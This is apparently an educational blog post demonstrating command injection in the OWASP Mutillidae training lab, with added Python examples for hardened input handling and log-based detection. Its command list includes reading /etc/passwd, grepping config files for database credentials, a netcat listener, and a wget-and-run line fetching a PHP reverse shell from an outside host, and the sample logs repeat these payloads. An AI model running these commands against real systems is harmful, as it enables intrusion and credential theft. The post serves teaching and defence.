In this post, we covered the command injection vulnerability and performed a practical demonstration using the OWASP Mutillidae lab.

Command injection is a widespread and dangerous vulnerability that allows an attacker to execute system commands remotely, with impacts ranging from data leaks to full denial of service.

What’s Command Injection?

So, what is command injection? It’s a vulnerability that pops up when a web application doesn’t properly validate or sanitize the input it gets from users before passing it to a system shell. Think about a search box or a comment section on a website. If an attacker can sneak in their own commands along with their input, they can trick the server into running those commands. It’s like telling the server to do one thing, but secretly making it do something else entirely.
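The pattern described above, shown in code. This is an added example and is not code from the original post or from Mutillidae; the handler, the function names, the hostname allow-list and the sample inputs are assumptions chosen for illustration. It contrasts the vulnerable pattern (user input concatenated into a string that a shell parses) with a hardened form (an allow-list hostname check followed by an argument list run without a shell), and tokenises the vulnerable string the way /bin/sh would, so you can see one lookup turn into two commands:

```python
"""Command injection in a DNS-lookup handler: vulnerable pattern next to a hardened one.

Added example written for this post; not code from the original article or from
Mutillidae. Function names, the allow-list and the sample inputs are assumptions.
"""
import re
import shlex
import subprocess

# RFC 1123 hostname shape: labels of 1-63 letters, digits or hyphens that do not
# start or end with a hyphen, joined by dots, at most 253 characters in total.
# Internationalised names should be converted to punycode before this check.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME_RE = re.compile(rf"(?:{_LABEL}\.)*{_LABEL}\.?")

# Shell operators that turn one command line into several commands.
_SEPARATORS = {";", "&", "&&", "|", "||"}


def is_valid_hostname(host: str) -> bool:
    """Allow-list check: accept only strings shaped like a hostname."""
    if not host or len(host) > 253:
        return False
    return _HOSTNAME_RE.fullmatch(host) is not None


def vulnerable_command(host: str) -> str:
    """The bug: raw user input is glued into a string that a shell will parse.

    A real handler would hand this string to os.system() or
    subprocess.run(..., shell=True); returning it instead keeps the example
    harmless while showing exactly what the shell receives.
    """
    return "nslookup " + host


def shell_tokens(command: str) -> list:
    """Tokenise a command line the way /bin/sh does, keeping operators as tokens."""
    return list(shlex.shlex(command, posix=True, punctuation_chars=True))


def count_shell_commands(host: str) -> int:
    """How many separate commands the shell would run for this input."""
    seps = [t for t in shell_tokens(vulnerable_command(host)) if t in _SEPARATORS]
    return 1 + len(seps)


def safe_lookup_argv(host: str) -> list:
    """Hardened form: validate first, then build an argv list with no shell.

    With an argument list and shell=False, ';', '&&', '|' and '$(...)' are
    never interpreted. The validator also rejects a leading hyphen, so the
    value cannot be mistaken for a command-line option either.
    """
    if not is_valid_hostname(host):
        raise ValueError(f"rejected hostname: {host!r}")
    return ["nslookup", host]


def safe_lookup(host: str, timeout: float = 10.0) -> str:
    """Run the lookup without a shell; only reached with a validated hostname."""
    result = subprocess.run(
        safe_lookup_argv(host),
        capture_output=True, text=True, timeout=timeout, check=False,
    )
    return result.stdout


if __name__ == "__main__":
    # Constructed inputs: a normal lookup and one carrying an injected command.
    for candidate in ("example.com", "example.com; cat /etc/passwd"):
        verdict = "accepted" if is_valid_hostname(candidate) else "rejected"
        print(f"{candidate!r}: shell would run {count_shell_commands(candidate)} "
              f"command(s); {verdict} by the validator")
```

The allow-list is the important half: blocklisting `;` or `&&` is easy to bypass (newlines, `$(...)`, backticks), whereas rejecting everything that is not a hostname and then skipping the shell entirely leaves no parser for the attacker to talk to.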

My Step-by-Step Attack

In my demonstration, I used a DNS lookup tool in the lab to show how this works. Here’s how I went from a simple lookup to owning the whole system:

  1. Finding My Bearings: I started by appending some basic commands to the DNS lookup. I used pwd to see what directory I was in and cat /etc/passwd to see if I could read the system’s password file. Both worked, which confirmed the vulnerability.
  2. Digging for Gold (MySQL Credentials): My next goal was to find the database credentials. I used the find command to search for any PHP files that contained the words “password” or “user,” hoping to find a configuration file. This led me straight to the MySQL username (“root”) and password (“very level of application”).
  3. The Grand Finale: Getting a Shell: This is the ultimate goal for any attacker. I wanted to get a full, interactive shell on the server.
    • First, I set up a Netcat listener on my own machine. This is like opening a door and waiting for a connection to come through.
    • Next, I used the command injection vulnerability to make the server download a PHP reverse shell from my machine and then run it.
    • As soon as the server ran the script, it connected back to my listener, and just like that, I had a shell! I could now run commands like whoami and ls as if I were logged directly into the server.

Owning the System

With a shell on the machine, it was game over. I demonstrated how I could navigate the entire file system, read any file I wanted, and basically do anything I pleased. The system was now completely under my control. This really shows how a seemingly small flaw can lead to a total compromise.

Technical Commands I Used

Here’s a list of the commands I used during the attack:

  • pwd
  • cat /etc/passwd
  • find . -name "*.php" -exec grep -i "password" {} \;
  • find . -name "*.php" -exec grep -i "user\|login" {} \;
  • cat /var/www/html/mutillidae/config.inc
  • nc -lvp 4444
  • wget http://192.168.1.104/shell.php -O /tmp/shell.php && php /tmp/shell.php
  • id
  • ls
  • cd ..
  • cd /
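For the defensive side, here is how the injected values from the list above would look in a web server access log and how a simple detection rule can pick them out. This is an added example, not code from the original post or from Mutillidae; the log lines are constructed, and the request format (a GET parameter named target_host on the DNS-lookup page) is an assumption made so the payload is visible in the URL:

```python
"""Spotting command-injection attempts in web server access logs.

Added example written for this post; not code from the original article or from
Mutillidae. The log lines are constructed and the GET parameter name is assumed.
"""
import re
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Apache/nginx "combined" style line: client IP, timestamp, request line, status.
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Shell operators that chain or substitute commands (matched after URL decoding).
_META_RE = re.compile(r"[;&|`\n]|\$[({]")

# Substrings taken from the post's own command list that never belong in a hostname.
_TOKENS = ("/etc/passwd", "wget ", "curl ", "bash ", "/tmp/")


def parse_line(line: str) -> Optional[dict]:
    """Split one access-log line into fields plus decoded query parameters."""
    m = _LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qs URL-decodes, so %3B and %26%26 come back as ';' and '&&'.
    rec["params"] = parse_qs(parts.query, keep_blank_values=True)
    return rec


def inspect_value(value: str) -> list:
    """Return the reasons a parameter value looks like injected shell syntax."""
    reasons = []
    if _META_RE.search(value):
        reasons.append("shell operator")
    low = value.lower()
    reasons += [f"token {t.strip()!r}" for t in _TOKENS if t in low]
    return reasons


def find_injection_attempts(lines) -> list:
    """Scan log lines; return one finding per suspicious parameter value."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for name, values in rec["params"].items():
            for value in values:
                reasons = inspect_value(value)
                if reasons:
                    findings.append({
                        "ip": rec["ip"], "ts": rec["ts"], "path": rec["path"],
                        "param": name, "value": value, "reasons": reasons,
                    })
    return findings


# Constructed sample: one benign lookup, then two attempts mirroring the post's payloads.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Mar/2024:10:01:02 +0000] "GET /mutillidae/index.php?page=dns-lookup.php'
    '&target_host=example.com HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Mar/2024:10:02:15 +0000] "GET /mutillidae/index.php?page=dns-lookup.php'
    '&target_host=example.com%3Bcat+%2Fetc%2Fpasswd HTTP/1.1" 200 6144 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Mar/2024:10:03:40 +0000] "GET /mutillidae/index.php?page=dns-lookup.php'
    '&target_host=example.com%26%26wget+http%3A%2F%2F192.168.1.104%2Fshell.php+-O+%2Ftmp%2Fshell.php'
    ' HTTP/1.1" 200 2100 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in find_injection_attempts(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['path']} {f['param']}={f['value']!r}: "
              f"{', '.join(f['reasons'])}")
```

Two practical points: if the form submits by POST, a plain access log never shows the value, so the same check belongs on a WAF log, on application-side logging of the submitted hostname, or on the reject path of the server-side validator; and always decode before matching, because `%3B` and `%26%26` only become `;` and `&&` after URL decoding.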

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, who is a cybersecurity content creator and YouTuber.